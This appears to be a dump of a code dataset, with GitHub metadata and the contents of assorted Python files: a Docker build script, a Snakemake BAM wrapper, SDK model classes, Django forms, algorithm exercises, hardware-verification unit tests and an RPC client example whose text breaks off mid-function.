blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
288
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 684
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 147
values | src_encoding
stringclasses 25
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 128
12.7k
| extension
stringclasses 142
values | content
stringlengths 128
8.19k
| authors
listlengths 1
1
| author_id
stringlengths 1
132
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
be6a016ce6c16fe2faa6e74c48ad6571cc088641
|
b33ddc7b89d05e19fdeb69593872fd174fab9f4f
|
/URI-py/2875.py
|
49dc31d7091f31bea192a97075a7c40e9e9f21a3
|
[] |
no_license
|
ThiagoCComelli/URI-Online-Judge
|
8b8d609d880342b39ba0d396c0610ecb7e01a5af
|
5348f736b2d683f4b857232c22cccb7c1d8b8d65
|
refs/heads/master
| 2020-07-23T15:14:05.353948 | 2020-03-10T19:42:12 | 2020-03-10T19:42:12 | 207,606,956 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 337 |
py
|
# -*- coding: utf-8 -*-
while True:
try:
n,m = map(int, input().split())
lista = []
lista1= []
for i in range(n):
lista.append(input().split())
while True:
for i in range(n):
for j in range(m):
a =a
except EOFError:
break
|
[
"[email protected]"
] | |
0a1abc1df723114b5f626549217071f99ce3f6d6
|
1dce03e6f3f5b23d1e5c599678624638943b9422
|
/docker/create_docker_images2.py
|
c963255960a9c9025948e08941e44f9ffe9c6e2f
|
[] |
no_license
|
volat1977/byte_of_python
|
76ec958bdc51c7538bb24e5d152b456feab603ca
|
60b58ca3927ef5e2801c93dd676d5f8b4c03d9fc
|
refs/heads/master
| 2020-12-26T07:23:10.562537 | 2020-03-24T05:31:03 | 2020-03-24T05:31:03 | 237,431,769 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 587 |
py
|
from io import BytesIO
import docker
dockerfile = '''
# Shared Volume
FROM busybox:buildroot-2014.02
VOLUME /data
CMD ["/bin/sh"]
'''
f = BytesIO(dockerfile.encode('utf-8'))
cli = docker.from_env()
response = cli.api.build(fileobj=f, rm=True, tag='test3', decode=True)
#for line in response:
# if line.keys()[0] in ('stream', 'error'):
# value = line.values()[0].strip()
# if value:
# print(value)
# for line in response:
# if line.keys in ('stream', 'error'):
# value = line.values()[0].strip()
# if value:
# print(value)
|
[
"[email protected]"
] | |
d753d0c4da9bb638deab2a12cfdd73f9e4680cb5
|
bac7a7507933ac5bb38b41bbe2a587764da3cf94
|
/snappy_wrappers/wrappers/link_in_bam/wrapper.py
|
09790324734c2213f0b8a7b3f82af6b18a1c8997
|
[
"MIT"
] |
permissive
|
Pregelnuss/snappy-pipeline
|
923b0f36117a2f55ee52f9a8564ed3bb82a8be16
|
31200eba84bff8e459e9e210d6d95e2984627f5c
|
refs/heads/master
| 2023-06-19T07:24:04.736033 | 2021-05-27T07:24:05 | 2021-05-27T07:24:05 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,063 |
py
|
# -*- coding: utf-8 -*-
"""CUBI+Snakemake wrapper code for external: Snakemake wrapper.py
"""
from snakemake import shell
__author__ = "Oliver Stolpe <[email protected]>"
shell.executable("/bin/bash")
this_file = __file__
input = snakemake.params.args["input"]
if not input:
raise Exception("No bam found")
shell(
r"""
set -x
# Write out information about conda installation.
conda list >{snakemake.log.conda_list}
conda info >{snakemake.log.conda_info}
# Also pipe stderr to log file
if [[ -n "{snakemake.log.log}" ]]; then
if [[ "$(set +e; tty; set -e)" != "" ]]; then
rm -f "{snakemake.log.log}" && mkdir -p $(dirname {snakemake.log.log})
exec 2> >(tee -a "{snakemake.log.log}" >&2)
else
rm -f "{snakemake.log.log}" && mkdir -p $(dirname {snakemake.log.log})
echo "No tty, logging disabled" >"{snakemake.log.log}"
fi
fi
# Setup auto-cleaned TMPDIR
export TMPDIR=$(mktemp -d)
trap "rm -rf $TMPDIR" EXIT
mkdir -p $TMPDIR/tmp.d
# Link in bam files with the proper file name scheme
ln -sr {input} {snakemake.output.bam}
# Link in resultin BAM file or create index
if [[ -e {input}.bai ]]; then
ln -sr {input}.bai {snakemake.output.bam_bai}
else
samtools index {snakemake.output.bam}
fi
# Build MD5 files
pushd $(dirname {snakemake.output.bam})
md5sum $(basename {snakemake.output.bam}) > $(basename {snakemake.output.bam}).md5
md5sum $(basename {snakemake.output.bam_bai}) > $(basename {snakemake.output.bam_bai}).md5
popd
# QC Report ---------------------------------------------------------------------------------------
# gather statistics from BAM file
# TODO: use pipes for only reading once from disk?
samtools stats {snakemake.output.bam} > {snakemake.output.report_bamstats_txt}
samtools flagstat {snakemake.output.bam} > {snakemake.output.report_flagstats_txt}
samtools idxstats {snakemake.output.bam} > {snakemake.output.report_idxstats_txt}
# call plot-bamstats
mkdir $TMPDIR/bamstats.d
plot-bamstats \
-p $TMPDIR/bamstats.d/ \
{snakemake.output.report_bamstats_txt} \
|| true # ignore failure
# Convert HTML report into one file.
inline-html \
--in-file $TMPDIR/bamstats.d/index.html \
--out-file {snakemake.output.report_bamstats_html} \
|| touch {snakemake.output.report_bamstats_html}
# Build MD5 files for the reports
md5sum {snakemake.output.report_bamstats_html} > {snakemake.output.report_bamstats_html_md5}
md5sum {snakemake.output.report_bamstats_txt} > {snakemake.output.report_bamstats_txt_md5}
md5sum {snakemake.output.report_flagstats_txt} >{snakemake.output.report_flagstats_txt_md5}
md5sum {snakemake.output.report_idxstats_txt} > {snakemake.output.report_idxstats_txt_md5}
# Additional logging for transparency & reproducibility
# Logging: Save a copy this wrapper (with the pickle details in the header)
cp {this_file} $(dirname {snakemake.log.log})/wrapper.py
# Logging: Save a permanent copy of the environment file used
cp $(dirname {this_file})/environment.yaml $(dirname {snakemake.log.log})/environment_wrapper.yaml
"""
)
|
[
"[email protected]"
] | |
e61d9c8b65dd2e6ddb62065629685896f512ffb7
|
0fe37e11df976c55fe5bbe492879b7cd8a95b7c5
|
/1_2_python变量_输出和输入_数字_字符串/04_str_test.py
|
3444adc19895857e5d4fee8cb2347e41708b2bfb
|
[] |
no_license
|
1286211699/mmc_code
|
9bb7761107604b445dea4fe5acf9d503fbc28dfa
|
ee97879632dfd7d24c604f7db52c82fa29109daa
|
refs/heads/master
| 2022-12-08T23:19:06.382825 | 2020-05-08T13:59:46 | 2020-05-08T13:59:46 | 177,100,815 | 2 | 0 | null | 2022-12-08T01:42:47 | 2019-03-22T08:25:37 |
HTML
|
UTF-8
|
Python
| false | false | 1,896 |
py
|
# name = 'for'
#
# name = "for's name is for"
# print(name)
# print('abcd\tefg')
# print('My name is %s'%('for'))
# print('I am %d years old'%(18))
# print('his height is %f m'%(1.78))
# print('his height is %.2f m'%(1.78))
# name = 'while'
#
# print(name[1:3])
# str_test = 'hello world world'
#
# print(str_test.partition('o'))
# print(str_test.rpartition('o'))
# my_str = 'hello:world:python '
# print(my_str)
# print(my_str.replace('l','w'))
# # print(my_str.splitlines())
# # print(my_str.split(':'))
# print(str_test.count('l'))
#
# print(str_test.find('w'))
#
# print(str_test.rfind('w'))
#
# print(str_test.index('o'))
# print(str_test.rindex('o'))
# print(str_test[::-1])
# print(str_test[::-2])
#
# print(str_test[1:9:-1])
# print(str_test[9:1:-1])
# print(str_test[0:7])
#
# print(str_test[:7])
#
# print(str_test[2:])
#
# print(str_test[:])
# print(str_test[::2])
# print(str_test[0:7:2])
# str_test = ' for '
# print(str_test.strip())#在以后的数据清洗中战友很大的比重
# print(str_test.rstrip())
# print(str_test.lstrip())
# print(str_test.center(10,'x'))
# print(str_test.ljust(10,'x'))
# print(str_test.rjust(10,'x'))
# print(str_test.zfill(10))
#
# python = '{} is {}'
#
# print(python.format('for','cool'))
#
# print('hello'.upper())
# print('HELLO'.lower())
#
# print('12345a'.isalnum())
# print('abcdef'.isalpha())
# print('12345'.isdigit())
# print('HELLO'.isupper())
# print('hello'.islower())
# print(' '.isspace())
#
# print('for is cool'[3:].startswith(' '))
# print('for is cool'[3:].endswith('cool'))
# print(ord('a'))
# print(chr(97))
u = '学神'
str1 = u.encode()
print(str1)
str2 = u.encode()
print(str2)
u1 = str1.decode('gbk')
print(u1)
u2 = str2.decode('utf-8')
print(u2)
|
[
"[email protected]"
] | |
404ccc4de81309e69083b0b19bb3d53830a09a20
|
9b64f0f04707a3a18968fd8f8a3ace718cd597bc
|
/huaweicloud-sdk-gaussdbfornosql/huaweicloudsdkgaussdbfornosql/v3/model/list_instances_datastore_result.py
|
34f5b1f20917eabd5ea29c17543d8217b496429f
|
[
"Apache-2.0"
] |
permissive
|
jaminGH/huaweicloud-sdk-python-v3
|
eeecb3fb0f3396a475995df36d17095038615fba
|
83ee0e4543c6b74eb0898079c3d8dd1c52c3e16b
|
refs/heads/master
| 2023-06-18T11:49:13.958677 | 2021-07-16T07:57:47 | 2021-07-16T07:57:47 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,366 |
py
|
# coding: utf-8
import re
import six
class ListInstancesDatastoreResult:
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'type': 'str',
'version': 'str'
}
attribute_map = {
'type': 'type',
'version': 'version'
}
def __init__(self, type=None, version=None):
"""ListInstancesDatastoreResult - a model defined in huaweicloud sdk"""
self._type = None
self._version = None
self.discriminator = None
self.type = type
self.version = version
@property
def type(self):
"""Gets the type of this ListInstancesDatastoreResult.
数据库引擎。
:return: The type of this ListInstancesDatastoreResult.
:rtype: str
"""
return self._type
@type.setter
def type(self, type):
"""Sets the type of this ListInstancesDatastoreResult.
数据库引擎。
:param type: The type of this ListInstancesDatastoreResult.
:type: str
"""
self._type = type
@property
def version(self):
"""Gets the version of this ListInstancesDatastoreResult.
数据库版本号。
:return: The version of this ListInstancesDatastoreResult.
:rtype: str
"""
return self._version
@version.setter
def version(self, version):
"""Sets the version of this ListInstancesDatastoreResult.
数据库版本号。
:param version: The version of this ListInstancesDatastoreResult.
:type: str
"""
self._version = version
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
import simplejson as json
return json.dumps(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ListInstancesDatastoreResult):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
[
"[email protected]"
] | |
3c061683d05e01d2e49fdf44a9642b8ba3230d38
|
7942342d457276bb266228d0236af647b3d55477
|
/django/contrib/auth/__init__.pyi
|
24b49bc00c2f2782b020918d77e8d81ac3a388da
|
[
"MIT"
] |
permissive
|
AsymmetricVentures/mypy-django
|
847c4e521ce4dec9a10a1574f9c32b234dafd00b
|
f6e489f5cf5672ecede323132665ccc6306f50b8
|
refs/heads/master
| 2020-06-30T01:53:44.434394 | 2016-12-22T22:45:50 | 2016-12-22T22:45:50 | 74,397,884 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 840 |
pyi
|
# Stubs for django.contrib.auth (Python 3.6)
#
# NOTE: This dynamically typed stub was automatically generated by stubgen.
from typing import Any, Optional
from django.apps import apps as django_apps
from .signals import user_logged_in as user_logged_in, user_logged_out as user_logged_out, user_login_failed as user_login_failed
SESSION_KEY = ... # type: str
BACKEND_SESSION_KEY = ... # type: str
HASH_SESSION_KEY = ... # type: str
REDIRECT_FIELD_NAME = ... # type: str
def load_backend(path): ...
def get_backends(): ...
def authenticate(**credentials): ...
def login(request, user, backend: Optional[Any] = ...): ...
def logout(request): ...
def get_user_model(): ...
def get_user(request): ...
def get_permission_codename(action, opts): ...
def update_session_auth_hash(request, user): ...
default_app_config = ... # type: str
|
[
"[email protected]"
] | |
0405898d24af93f463de789847b0398a0e8e0b97
|
092d82f8a64f8e33a739ae023667253a75bfb9ae
|
/jury/forms.py
|
ac08bc91b6d6b266345bc9fb2f865acbf50bba23
|
[
"MIT"
] |
permissive
|
COdingaorg/The_Jury
|
8c103eec028891b1ee98ede786fb54638bd16ba6
|
a4432269a023edf49a010644ca4f06324a934d7f
|
refs/heads/main
| 2023-06-18T10:43:14.888503 | 2021-07-20T16:05:59 | 2021-07-20T16:05:59 | 386,658,998 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 679 |
py
|
from jury.models import UserProfile, UserProject
from django import forms
from django.contrib.auth.models import User
from django.contrib.auth.forms import UserCreationForm
class registerUser(UserCreationForm):
class Meta:
model = User
fields = ['username', 'first_name', 'last_name', 'email', 'password1', 'password2']
class UploadProjectForm(forms.ModelForm):
class Meta:
model = UserProject
fields = ['project_title', 'project_image', 'project_description', 'project_link']
class AddorEditProfile(forms.ModelForm):
class Meta:
model = UserProfile
fields = ['photo_path', 'user_bio', 'facebook_account', 'twitter_account', 'instagram_account']
|
[
"[email protected]"
] | |
5404e3ad8934d8abdd386447c64ee0c0a8c716f7
|
93f5ee5cc7b863029c54a766e9f5fa0b0e52191f
|
/BayesianOptimization/20180403_two_hparas.py
|
f2c660d6aa1078720adfdb30d305f189ed7051c7
|
[] |
no_license
|
ShihPingLai/Jacob-deep_learning
|
29ad17839da7a34e01db1a626942862e250e8619
|
dfbaa178ac537a189a062a23904072a7d8e550a9
|
refs/heads/master
| 2020-03-13T11:51:51.276939 | 2018-04-26T04:19:15 | 2018-04-26T04:19:15 | 131,108,620 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,156 |
py
|
#!/usr/bin/python3
'''
Abstract:
This is a program to exercise how to optimize deep learning with Bayesian Optimization.
Copy from "BayesianOptimization/examples/exploitation vs exploration.ipynb"
Usage:
20180403_two_hparas.py
Source:
BayesianOptimization/examples/exploitation vs exploration.ipynb
##################################
# Python3 #
# This code is made in python3 #
##################################
20170403
####################################
update log
20180403 version alpha 1:
1. I don't know
'''
# modules for Bayesian
from bayes_opt import BayesianOptimization
import pymc as pm
# modules for deep learning
import tensorflow as tf
# common modules
import numpy as np
import matplotlib.pyplot as plt
import time
from IPython.core.pylabtools import figsize
# Utility function for plotting
def plot_bo(f, bo, figname):
xs = [x["x"] for x in bo.res["all"]["params"]]
ys = bo.res["all"]["values"]
mean, sigma = bo.gp.predict(np.arange(len(f)).reshape(-1, 1), return_std=True)
plt.figure(figsize=(16, 9))
plt.plot(f)
plt.plot(np.arange(len(f)), mean)
plt.fill_between(np.arange(len(f)), mean+sigma, mean-sigma, alpha=0.1)
plt.scatter(bo.X.flatten(), bo.Y, c="red", s=50, zorder=10)
plt.xlim(0, len(f))
plt.ylim(f.min()-0.1*(f.max()-f.min()), f.max()+0.1*(f.max()-f.min()))
plt.savefig(figname)
return
#--------------------------------------------
# main code
if __name__ == "__main__":
VERBOSE = 0
# measure times
start_time = time.time()
#-----------------------------------
# load hyperparas
# use sklearn's default parameters for theta and random_start
gp_params = {"alpha": 1e-5, "n_restarts_optimizer": 2}
# Target function
np.random.seed(42)
xs = np.linspace(-2, 10, 10000)
f = np.exp(-(xs - 2)**2) + np.exp(-(xs - 6)**2/10) + 1/ (xs**2 + 1)
if VERBOSE>0:
plt.plot(f)
plt.show()
#-----------------------------------
# Acquisition function 1: Upper Confidence Bound
# Prefer exploitation (kappa=1.0)
bo = BayesianOptimization(f=lambda x: f[int(x)],
pbounds={"x": (0, len(f)-1)},
verbose=0)
bo.maximize(init_points=2, n_iter=25, acq="ucb", kappa=1, **gp_params)
plot_bo(f, bo, "ucb_exploitation.png")
# Prefer exploration (kappa=10)
bo = BayesianOptimization(f=lambda x: f[int(x)],
pbounds={"x": (0, len(f)-1)},
verbose=0)
bo.maximize(init_points=2, n_iter=25, acq="ucb", kappa=10, **gp_params)
plot_bo(f, bo, "ucb_exploration.png")
#-----------------------------------
# Acquisition function 2: Expected Improvement
# Prefer exploitation (xi=0.0)
bo = BayesianOptimization(f=lambda x: f[int(x)],
pbounds={"x": (0, len(f)-1)},
verbose=0)
bo.maximize(init_points=2, n_iter=25, acq="ei", xi=1e-4, **gp_params)
plot_bo(f, bo, "ei_exploitation.png")
# Prefer exploration (xi=0.1)
bo = BayesianOptimization(f=lambda x: f[int(x)],
pbounds={"x": (0, len(f)-1)},
verbose=0)
bo.maximize(init_points=2, n_iter=25, acq="ei", xi=0.1, **gp_params)
plot_bo(f, bo, "ei_exploration.png")
#-----------------------------------
# Acquisition function 3: Probability of Improvement
# Prefer exploitation (xi=0.0)
bo = BayesianOptimization(f=lambda x: f[int(x)], pbounds={"x": (0, len(f)-1)}, verbose=0)
bo.maximize(init_points=2, n_iter=25, acq="poi", xi=1e-4, **gp_params)
plot_bo(f, bo, "poi_exploitation.png")
# Prefer exploration (xi=0.1)
bo = BayesianOptimization(f=lambda x: f[int(x)], pbounds={"x": (0, len(f)-1)}, verbose=0)
bo.maximize(init_points=2, n_iter=25, acq="poi", xi=0.1, **gp_params)
plot_bo(f, bo, "poi_exploration.png")
#-----------------------------------
# measuring time
elapsed_time = time.time() - start_time
print ("Exiting Main Program, spending ", elapsed_time, "seconds.")
|
[
"[email protected]"
] | |
c88a1af397f5418a03100cac9cde8e9e4629f207
|
34d1d64a049dd3a25293955f6312072f2fcb3905
|
/set-1/challenge2.py
|
f54288641f2df4a0648832da78827542e6a9bb54
|
[] |
no_license
|
alex-bellon/cryptopals
|
c82ec87377911e6cae365cb48b2058789b93b9a1
|
5bc6242a5b972866ba7eebe2f6efa80c7ebff71c
|
refs/heads/master
| 2020-05-03T18:40:02.320249 | 2019-08-16T21:15:27 | 2019-08-16T21:15:27 | 178,761,916 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 189 |
py
|
a = '1c0111001f010100061a024b53535009181c'
b = '686974207468652062756c6c277320657965'
aBin = bin(int(a, 16))[2:]
bBin = bin(int(b, 16))[2:]
c = int(aBin, 2) ^ int(bBin, 2)
print(hex(c))
|
[
"[email protected]"
] | |
26534e055871d229971a287afd01f30afec488e8
|
03d07de94fc22d1583c45ca84c711a06df8a40ff
|
/lc/dynamic_programming/lc_91_decode-ways.py
|
47e6fb60ea6793ea85275e7e4575d8b528ab5713
|
[] |
no_license
|
gaopenghigh/algorithm
|
94e04293c69a2ad6903495e1cf6e1b75556535bb
|
f5d78c98c7201c56f9d4c3a9c0c76e9447a17985
|
refs/heads/master
| 2022-03-11T18:46:38.712923 | 2022-02-20T14:20:54 | 2022-02-20T14:20:54 | 54,484,549 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,054 |
py
|
# 91. 解码方法
# 难度 中等
# 一条包含字母 A-Z 的消息通过以下映射进行了 编码 :
# 'A' -> "1"
# 'B' -> "2"
# ...
# 'Z' -> "26"
# 要 解码 已编码的消息,所有数字必须基于上述映射的方法,反向映射回字母(可能有多种方法)。例如,"11106" 可以映射为:
# "AAJF" ,将消息分组为 (1 1 10 6)
# "KJF" ,将消息分组为 (11 10 6)
# 注意,消息不能分组为 (1 11 06) ,因为 "06" 不能映射为 "F" ,这是由于 "6" 和 "06" 在映射中并不等价。
# 给你一个只含数字的 非空 字符串 s ,请计算并返回 解码 方法的 总数 。
# 题目数据保证答案肯定是一个 32 位 的整数。
#
# 示例 1:
# 输入:s = "12"
# 输出:2
# 解释:它可以解码为 "AB"(1 2)或者 "L"(12)。
#
# 示例 2:
# 输入:s = "226"
# 输出:3
# 解释:它可以解码为 "BZ" (2 26), "VF" (22 6), 或者 "BBF" (2 2 6) 。
#
# 示例 3:
# 输入:s = "0"
# 输出:0
# 解释:没有字符映射到以 0 开头的数字。
# 含有 0 的有效映射是 'J' -> "10" 和 'T'-> "20" 。
# 由于没有字符,因此没有有效的方法对此进行解码,因为所有数字都需要映射。
#
# 提示:
# 1 <= s.length <= 100
# s 只包含数字,并且可能包含前导零。
# 动态规划第一步要明确两点,「状态」和「选择」。
# 状态,就是对一个局面的描述。通过一个状态,可以定义一个子问题,而动态规划的核心就是分解为子问题。
# 选择,就是某个动作,通过一个动作,问题可以拆解为子问题
# 动态规划的框架如下:
# for 状态1 in 状态1的所有取值:
# for 状态2 in 状态2的所有取值:
# for ...
# dp[状态1][状态2][...] = 择优(选择1,选择2...)
#
# 本题中,“状态”就是带解码的字符串,
# 至于选择,对于每个字符串的最后一个字符,可以选择自成一体,或者选择与它前面的字符合体。
# 使用 dp[i] = x 表示 s[:i] 最多有 x 中解码方式。
# 对于 s[:i] 的最后一个字符 s[i-1],有如下几种情况
# 1. s[i-1] 自称一体,前提是 1 <= int(s[i-1]) <= 9,则 dp[i] = dp[i-1]
# 2. s[i-1] 和 s[i-2] 合体,前提是 s[i-2] != '0' 并且 1 <= int(s[i-2]) * 10 + int(s[i-1]) <= 26,则 dp[i] = dp[i-2]
# 两者之和就是最终 dp[i] 的值
# base case: dp[0] = 1, 表示空字符串也算是一种解码方法
# 另外由于 dp[i] 只依赖于 dp[i-1] 和 dp[i-2],所以可以压缩 dp 数组,只用 3 个变量即可
class Solution:
def numDecodings(self, s: str) -> int:
dp = [0 for _ in range(len(s)+1)]
dp[0] = 1
for i in range(1, len(s)+1):
x = 0
if 1 <= int(s[i-1]) <= 9:
x = dp[i-1]
if s[i-2] != '0' and 1 <= int(s[i-2])*10 + int(s[i-1]) <= 26:
x += dp[i-2]
dp[i] = x
return dp[len(s)]
if __name__ == '__main__':
s = '12'
print(Solution().numDecodings(s))
|
[
"[email protected]"
] | |
6ffabdb437b2f0229262f2a7b57b5eb2b66df757
|
beb12cce69e21804a9ec4d64062bf6bb062261aa
|
/bin/EAFP.py
|
74646c34e932b3821298f5c393f4bebacf076c1c
|
[] |
no_license
|
voyeg3r/dotfaster
|
f7a0cad32ea3420417cd728be24a58533cb907fa
|
90c4f1ec4471668fec1f4db755158058fb533be2
|
refs/heads/master
| 2021-01-02T22:49:47.246952 | 2018-06-02T20:56:58 | 2018-06-02T20:56:58 | 99,405,357 | 5 | 2 | null | null | null | null |
UTF-8
|
Python
| false | false | 678 |
py
|
#!/usr/bin/env python3
# # -*- coding: UTF-8 -*-"
# ------------------------------------------------
# Creation Date: 23-03-2017
# Last Change: ter 29 nov 2016 09:21:52 BRT
# File: EAFP.py
# author: sergio luiz araujo silva
# site: http://vivaotux.blogspot.com
# twitter: @voyeg3r
# ------------------------------------------------
'''
This script attempts to show the concept of:
It is easyer to ask forgiveness than permission
'''
person = {'name': 'Jess', 'age': 23, 'job': 'Programmer'}
try:
print("I'm {name}. I'm {age} years old and I'm {job}".format(**person))
except KeyError as e:
print(f"Missing {e} key")
|
[
"[email protected]"
] | |
0876651216fe8d66b6ac1486bdb463a7eb6bcf0b
|
b37b62a73a14ed3904ffed1db99dafe01bc9eca3
|
/app/list/models.py
|
3c3e2f812571158f337b54618fddebb78ef4c17e
|
[] |
no_license
|
gambler1541/django-pagination
|
d340d7ce3186f801ce1cf4aadb59ee77bd52e9d6
|
44c32be793c0bd2332f29ba5422205ccf0c2d2b8
|
refs/heads/master
| 2020-04-16T22:56:16.565405 | 2019-01-16T06:59:51 | 2019-01-16T06:59:51 | 165,990,830 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 146 |
py
|
from django.db import models
from django.views.generic import ListView
class Constacts(models.Model):
text = models.TextField(default='')
|
[
"[email protected]"
] | |
fb20a737b4b3bc2e0a86a1ea9b5a7945456c6851
|
dacdebab897f9287f37a2e85c5705a926ddd36aa
|
/tests/test_issue930/Snakefile
|
06cbf60fd181788b35dd44ff28d8bc6855f13952
|
[
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
snakemake/snakemake
|
5d4528193d87786d7b372ca7653ece302ff46965
|
27b224ed12448df8aebc7d1ff8f25e3bf7622232
|
refs/heads/main
| 2023-09-02T08:37:04.323976 | 2023-08-11T10:02:34 | 2023-08-11T10:02:34 | 212,840,200 | 1,941 | 536 |
MIT
| 2023-09-11T09:51:44 | 2019-10-04T14:58:11 |
HTML
|
UTF-8
|
Python
| false | false | 646 |
samples = ["0","1"]
rule all:
input:
"test.out"
rule build_index:
output:
"large_reference_index"
shell:
"touch {output}"
rule a:
output:
"a/{sample}.out"
group:
"sample_group"
shell:
"touch {output}"
rule b:
input:
rules.a.output,
rules.build_index.output
output:
"b/{sample}.out"
group:
"sample_group"
shell:
"touch {output}"
rule c:
input:
expand("a/{sample}.out", sample=samples),
expand("b/{sample}.out", sample=samples)
output:
"test.out"
shell:
"touch {output}"
|
[
"[email protected]"
] | ||
25ed4fc80f15bd27a6243626cc74db6d6f20abe2
|
8bb3bcf914860c20fb4a7163a8e0691cd802dd65
|
/ve/unit/test_list_object.py
|
df090cc057e76b5308629ac65f3383056bb0ac50
|
[
"Apache-2.0"
] |
permissive
|
nitinm694/pyvsc
|
8586cc2497f336289fecbfeb9e6dd788f4070b60
|
612de9e6244c685a3df1972e4860abfe35b614e1
|
refs/heads/master
| 2023-07-28T01:49:10.917496 | 2021-09-12T19:06:00 | 2021-09-12T19:06:00 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,362 |
py
|
'''
Created on Jun 20, 2020
@author: ballance
'''
import vsc
from vsc_test_case import VscTestCase
from vsc.visitors.model_pretty_printer import ModelPrettyPrinter
class TestListObject(VscTestCase):
def test_smoke(self):
@vsc.randobj
class item_c(object):
def __init__(self):
self.a = vsc.rand_uint8_t()
self.b = vsc.rand_uint8_t()
@vsc.randobj
class container_c(object):
def __init__(self):
self.l = vsc.rand_list_t(item_c())
for i in range(10):
self.l.append(item_c())
c = container_c()
c.randomize()
for i,it in enumerate(c.l):
print("Item[" + str(i) + "] a=" + str(it.a) + " b=" + str(it.b))
def test_constraints(self):
@vsc.randobj
class item_c(object):
def __init__(self):
self.a = vsc.rand_uint8_t()
self.b = vsc.rand_uint8_t()
@vsc.randobj
class container_c(object):
def __init__(self):
self.l = vsc.rand_list_t(item_c())
for i in range(10):
self.l.append(item_c())
@vsc.constraint
def all_eq_c(self):
with vsc.foreach(self.l) as it:
it.a == it.b
c = container_c()
for i in range(100):
c.randomize()
for it in c.l:
self.assertEqual(it.a, it.b)
def test_init_array_block(self):
@vsc.randobj
class item_c(object):
def __init__(self):
self.a = vsc.rand_uint8_t()
self.b = vsc.rand_uint8_t()
@vsc.randobj
class container_c(object):
def __init__(self):
self.l = vsc.rand_list_t(item_c())
for i in range(10):
self.l.append(item_c())
@vsc.constraint
def all_eq_c(self):
with vsc.foreach(self.l, it=True,idx=True) as (idx,it):
with vsc.if_then((idx&1) == 0):
it.a < it.b
with vsc.else_then:
it.a > it.b
c = container_c()
for i in range(100):
c.randomize()
self.assertEqual(10, len(c.l))
for i,it in enumerate(c.l):
if (i%2) == 0:
self.assertLess(it.a, it.b)
else:
self.assertGreater(it.a, it.b)
def test_diff_classes(self):
@vsc.randobj
class item_c(object):
def __init__(self):
self.a = vsc.rand_uint8_t()
self.b = vsc.rand_uint8_t()
@vsc.randobj
class item_c_1(item_c):
def __init__(self):
super().__init__()
@vsc.constraint
def a_lt_b_c(self):
self.a < self.b
@vsc.randobj
class item_c_2(item_c):
def __init__(self):
super().__init__()
@vsc.constraint
def a_gt_b_c(self):
self.a > self.b
@vsc.randobj
class container_c(object):
def __init__(self):
self.l = vsc.rand_list_t(item_c())
for i in range(10):
if i%2 == 0:
self.l.append(item_c_1())
else:
self.l.append(item_c_2())
c = container_c()
print("Model: " + ModelPrettyPrinter.print(c.get_model()))
for i in range(100):
c.randomize()
self.assertEqual(10, len(c.l))
for i,it in enumerate(c.l):
if i%2 == 0:
self.assertLess(it.a, it.b)
else:
self.assertGreater(it.a, it.b)
|
[
"[email protected]"
] | |
8083d6ab3311a0ec517636a91fd33a22445421bd
|
7fa15c4dbca224aed616e76074bf017699af00df
|
/examples/sum_client.py
|
0011bc63474cfec50e1d633ae091f99a0ddb1f0e
|
[
"Apache-2.0"
] |
permissive
|
studio-ousia/mprpc
|
cc272e650b46a21997c680cf00e5ccbc015dc709
|
6076f68a16f78e0010307344afa253e0956f2a9d
|
refs/heads/master
| 2023-01-14T02:33:22.171728 | 2022-12-27T07:13:23 | 2022-12-27T07:13:23 | 13,551,567 | 170 | 60 |
NOASSERTION
| 2023-02-18T15:15:10 | 2013-10-14T03:15:41 |
Cython
|
UTF-8
|
Python
| false | false | 595 |
py
|
# -*- coding: utf-8 -*-
import gsocketpool.pool
import gevent.pool
from mprpc import RPCClient, RPCPoolClient
def call():
client = RPCClient('127.0.0.1', 6000)
print client.call('sum', 1, 2)
def call_using_pool():
